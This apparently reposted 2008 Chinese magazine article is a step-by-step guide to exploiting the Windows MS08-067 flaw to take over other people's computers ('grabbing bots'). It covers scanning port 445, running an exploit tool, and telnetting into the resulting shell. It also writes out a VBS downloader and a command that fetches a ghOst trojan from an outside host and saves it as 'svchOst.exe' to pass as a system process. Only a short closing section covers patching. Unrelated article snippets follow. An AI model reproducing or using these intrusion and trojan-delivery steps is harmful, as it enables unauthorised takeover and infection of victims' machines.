2008年最严重系统漏洞大曝光

来源 :网友世界 | 被引量 : 0次 | 上传用户:linzh
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段,不过远程溢出漏洞有很强的时效性,必须要抓紧时间利用这个漏洞还未被普遍补上的时机进行攻击,一旦过了这段时间,漏洞补上之后就很难再重现远程溢出攻击了。微软windows系统已经有一年多没有爆出远程溢出漏洞了,很多学黑的小菜都没有机会学习远程溢出攻击,即使学过远程溢出攻击,也没有可以实践的机会。2008年10月23日,微软爆出四年以来最严重的特大安全漏洞——MS08-067远程溢出漏洞,几乎影响所有Windows系统,并且很快成为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统将会非常之多!让我们快借此机会玩玩远程溢出吧!学过远程溢出的赶紧进行实践,抓肉鸡一抓就得!
  
  又是RPC惹的祸!MS08-067远程溢出漏洞简介
  
  曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
  受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有windowsXP/2000/vista/2003等。除Windows Server2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在windows 2000、windows XP和Windows Server2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
  
  军刀再现——漏洞主机扫描
  在利用MS08-067远程溢出漏洞进行攻击前,首先要找到要攻击的主机目标。由于启用了RPC服务的Windows系统往往会开放445端口,因此攻击者只要使用专业端口扫描工具扫描445端口,即可获取可溢出的主机列表。这里使用的是老牌扫描工具——图标是一个瑞士军刀的X-Scan。
  
  扫描设置
  步骤1:运行X-Scan后,首先需要设置扫描的目标IP地址段。点击工具栏上的“扫描参数”按钮,选择“检测范围”选项,在“指定IP范围”里可以输入一个固定的IP地址或IP地址段。
  步骤2:切换到“全局设置”→“扫描模块”选项,设置扫描模块为“开放服务”
  步骤3:在“插件设置”→“端口相关设置”中,将待检测的端口改为“445”。
  步骤4:在“全局设置”→“其它设置”中。将扫描类型设置为“无条件扫描”。
  步骤5:最后在“全局设置”→“扫描报告”中勾选“扫描完成后自动生成并显示报告”项,设置完毕后点击确定按钮,关闭对话框。
  步骤6:点击工具栏上的“开始扫描”按钮,X-scan就开始工作了。确定后,即可开始进行扫描。扫描结束后。会自动弹出一个扫描结果窗口查看到扫描结果。如果发现开放了445端口的主机,那么这些主机只要未及时打上补丁,都很可能遭受攻击成为入侵者的肉鸡!
  溢出很轻松MS08-067溢出工具溢出攻击
  
  现在我们可以一个一个的尝试溢出攻击扫描出来的目标了。首先。下载溢出攻击工具“MS08-067远程溢出漏洞利用工具”(下载地址:http:/www.youxia.org/upload/2008/10/MS08-067.rar),并将其解压于C盘根目录下。点击“开始”菜单→“运行”,输入命令“CMD”,回车后打开命令提示符窗口。进入溢出工具所有的文件夹“Release”目录下。执行命令“MS08-067.exe”,可看到溢出工具命令使用格式为:MS08-067.exe,将其中的Server换为自己要攻击的远程主机就可以了。
  
  建立空连接
  在攻击前,首先要与且标主机建立一个空连接,这里假设我们要攻击的目标主机为“192.168.1.8”,可执行如下命令:
  net use\\192.168.1.9\ipc$
  命令执行后,即可与远程主机建立一个空连接。
  
  执行远程溢出
  建立空连接后,即可进行溢出攻击了。攻击命令如下:
  MS08-067.exe 192.168.1.9
  执行攻击命令后,溢出程序就会自动与远程主机建立SMB连接。并进行溢出攻击。
  
  溢出返回结果
  溢出攻击后,往往会有不同的返回结果提示信息,一般有三种情况:
  如果返回的信息为:
  SMB Connect OK!
  Maybe Patched!
  那么说明远程主机上可能已经打上了该溢出漏洞补丁,虽然可以建立SMB连接,但是无法攻击成功。
  如果返回信息为:Make SMB Connection error:53或者Make SMB Connection error:1219,后面的数字可能是变化的。那么说明该主机没有开机联网或者没有安装Microsoft网络的文件和打印机共享协议或没有启动Server服务,因此无法进行溢出。
  还有—种情况是返回信息为:
  SMB Connect OK!
  RpcExceptionCode()=1722
  出现这样的情况,溢出失败,对方开启了防火墙。
  那么最后就是成功的提示信息了:
  SMB Connect OK!
  Send Payload Over!
  出现这样的提示,说明溢出成功,成功的发送溢出模块并绑定在了远程主机端口上。
  
  远程登录
  现在溢出成功后就可以远程登录了,登录命令很简单:Telnet IP地址4444直接用Telnet连接远程主机IP地址的4444端口就可以了。这里执行了命令:Telnet 119.1.41.97 4444
  成功的连接上了远程主机。在远程主机上执行命令“netstat-an”时,可以看到开放了4444端口,这就是溢出打开的端口。
  
  抓鸡,一个VBS搞定
  
  现在我们可以在远程主机上任意添加管理员帐户,或者开启3389远程桌面进行连接。不过最简单的还是用木马来进行攻击。
  
  配置木马
  首先,配置一个木马服务端程序,这里我选择了“ghOst3.6”。这个木马可以过瑞星和卡巴斯基的主动防御,非常强!将木马上传到某个空间中,然后在远程主机上执行命令: “taslist”,命令执行后可查看远程主机上的所有进程。这里我们发现远程主机未开启任何防火墙和杀毒软件,而且发现对方正在玩QQ游戏斗地主。没有运行杀毒软件的话,可以直接上传木马。连免杀都不用。如果发现杀毒软件进程的话,可以有针对性的进行免杀。
  
  生成下载脚本
  然后在远程命令窗口中执行如下命令:echo iLocal=LCase(WScript Arguments(1))>iget.vbeecho iRemote=LCase(WScript.Arguments(0))>>iget.vheecho Set xPost=CreateObject(“Microsoft.XMLHTTP”)>>iget.vbeecho xPost.Open“GET”,iRemote,0>>iget.vbeecho xPost.Send0>>iget.vheecho Set sGet=CreateObject(“ADODB.Stream”)>>iget.vbeecho sGet.Mode=3>>iget.vbeecho sGet.Type=1>>iget.vheecho sGet.Open0>>iget.vbeecho sGet.Write(xPost.responseBody)>>iget.vbeecho sGet.SaveToFile iLocal,2>>iget.vhe
  命令执行后,可在远程主机当前目录下生成一个名为“iget.vbe”的脚本文件。
  下载运行木马
  生成下载脚本后,就可以用脚本下载运行木马程序了。这里我们上传的木马连接地址为“http://xiaopuma.glcp.net:81/server.exe”,因此执行如下命令:
  cscript iget.vbe http://xiaopuma.glcp.net:81/server.exe svchOst.exe
  前面的“cscript”是用于执行脚本的,后面的“svchOst.exe”是下载木马后保存的文件名。命令执行后,木马就被下载到远程主机上了。在命令行窗口中执行“svchOst.exe”,即可成功运行木马程序。
  用木马客户端连接木马,一台肉鸡就到手啦!笔者在测试过程中。发现MS08-067远程溢出成功率可达30%以上。一般来说,只要远程主机上未安装防火墙,并且同时开启了Computer Browser、Server、Workstation这三个系统服务,并且存在此溢出漏洞,通常都可以溢出成功。
  
  防范MS08-067远程溢出
  
  由于MS08-067远程溢出危害非常大,因此有必要对其进行防范。但是由于前段时间的微软“黑屏”事件让不少用户成了关闭了自动更新,宁可系统漏洞百出也不去打补丁。于是此漏洞在许多主机上都存在。给黑客利用MS08-067漏洞进行攻击提供了可乘之机。其实造成盗版用户黑屏的补丁是KB892130,这个漏洞的安全补丁编号是KB958644,我们只要安装此补丁就可以了,也可以通过第三方工具,下载补丁包打上该补丁。
  另外,将Computer Browser、Server、Workstation这三个系统服务关闭,毕竟这三个服务在大多数情况下是用不到的。同时,为了防止以后RPC又出现什么漏洞,最好是安装防火墙,关闭本机的445端口。
其他文献
现在测试版的QQ邮箱可以像Gmail那样实现在线聊天的功能,可惜只有部分高等级用户才能提前体验。不过,现在我们可以通过“体验室”解决这一困难。  首先登录QQ邮箱的Web页面,单击页面顶端的“设置”按钮,进入设置页面后,切换到最右侧的“体验室”页面,这里提供了QQ邮箱的部分新功能或内测功能,在这里可以查看相关服务的开通情况,对于尚未开通的。只需要单击“申请开通”按钮进行提交,待申请通过之后即可使用
期刊
软件版本的升级固然是好事,可有时却也带来一些不便。Word 2007全新的界面和更丰富功能的整合使办公操作更加方便,但经常会遇到生成的文档无法在安装Word 2003等低版本的电脑内打开的情况,如果强行打开也只能看到乱码。要消除Word 2007的兼容问题并不需要安装多个版本的Office套件,只需要简单设置即可。  点击Word的开始按钮并点击“选项”。转入到“保存”并在“将文件保存为此格式”右
期刊
虽然Windows Vista的炫丽效果已经令人称羡,但与Ubuntu的窗口特效仍然无法相比,更别说Windows XP用户,只有暗自叹气的份。不过,只要借助Tophaz这款绿色软件,我们同样可以在Windows XP系统中获得非同一般的透明效果,例如,以高对比度显示当前活动窗口、让非活动窗口透明、让任务栏和开始菜单透明等。  首先请访问“http://samiwieciekto.devianta
期刊
一次在Vista下使用IE下载文件时。忽然发现很熟悉的“文件下载”对话框不见了。系统直接将文件下载到了临时文件夹,非常不便。究其原因。可能是在某次操作中,笔者误取消了对“打开此类文件前总是询问”项的勾选,那么,我们用什么方法才能将其找回来呢?答案很简单。  步骤1按下组合键(或单击“开始→运行”),调出“运行”对话框,输入“Regedit”打开注册表编辑器。  步骤2定位到“HKEY_CURREN
期刊
现在U盘已经很普及了,几十元就可以买到1GB的,而且很多手机也都自带U盘功能。因此要想从别人的电脑中复制一些文件出来,那是非常简单的事情。对电脑资料的安全产生了很大威胁。其实在Vista系统中我们不用担心这个问题,我们可以通过简单设置来禁用所有的USB存储设备,而且还可以让系统只能使用你指定的U盘!下面就来介绍一下设置方法。  首先把自己的U盘先插入到Vista系统中,让系统可以正常使用U盘,接着
期刊
默认情况下,Vista的登录界面上会显示本机所有的用户名,让你选择。其实有时我们不想让某些用户名出现在界面中。这时,可通过下面的方法,将其隐藏起来。  步骤1单击“开始→所有程序→附件”,右击其的“命令提示符”项,在弹出的右键菜单中选择“以管理员身份运行”,打开命令提示符窗口。  步骤2输入“netuser XXX /active:no”(其中XXX为要隐藏的用户名),回车。以后登录时,相应的用户
期刊
网友世界的FANS们,大家好,在上期的《从零眼我学黑客(六)》中,我为大家详细讲解了手工注入的原理及其实现方法,相信大家都已经学会了吧?那么在以后的日子中,没有了工具,朋友们一样可以凭借自己的入侵经验积累和手工注入技巧轻松进入网站的后台了。要知道,工具黑客和手工黑客,完全是两个层次的水平,工具谁都会用,但是对于手工,很多人却得不到进入其中的法门。看完了上次的文章,—位朋友问我,手工猜解密码的繁琐度
期刊
版主手记    2007年《网友世界》曾刊登过一篇关于一位患有脑癌的美国少年圆梦暴雪的新闻。这位身患绝症的少年Ezra是忠实的《魔兽世界》玩家,平生最大的愿望便是能参观暴雪总部,和《魔兽世界》的设计师——他心目中的英雄们面对面地接触一次。后来暴雪得知此事之后便邀请Ezra参观了暴雪总部,请他第一次尝试凤凰坐骑,为他制作任务以及以他的名字命名的武器。几天前不幸的消息传来,Ezra终因病情恶化去世,他
期刊
现在使用Linux和Windows双系统的用户越来越多,不过由于两者架构、内核不同,Linux和windows两者之间互联互通始终是个难题。今天我们就为它们搭座桥梁,让二者实现互相访问。这样,我们既可以利用windows在熟悉操作环境下操作Linux,同时也可以借助开源的Linux为windows服务。这里的双系统是指“C:(windowsXP SP2专业版)”+D:Ubuntu-8.04简体中支
期刊
大家早已用上了windows vista,美轮美奂的效果自然令人大开眼界,不过如果由于某些原因,你暂时无法体验这一系统的话,那么先在windows XP中玩一玩vista的声音效果和屏保程序也是相当的不错。    移植Vista的声音    首先,我们需要找到一台已安装windows Vista系统的计算机,依次进入系统磁盘的“Windows\Media\”文件夹,将其下的声音文件复制至Windo
期刊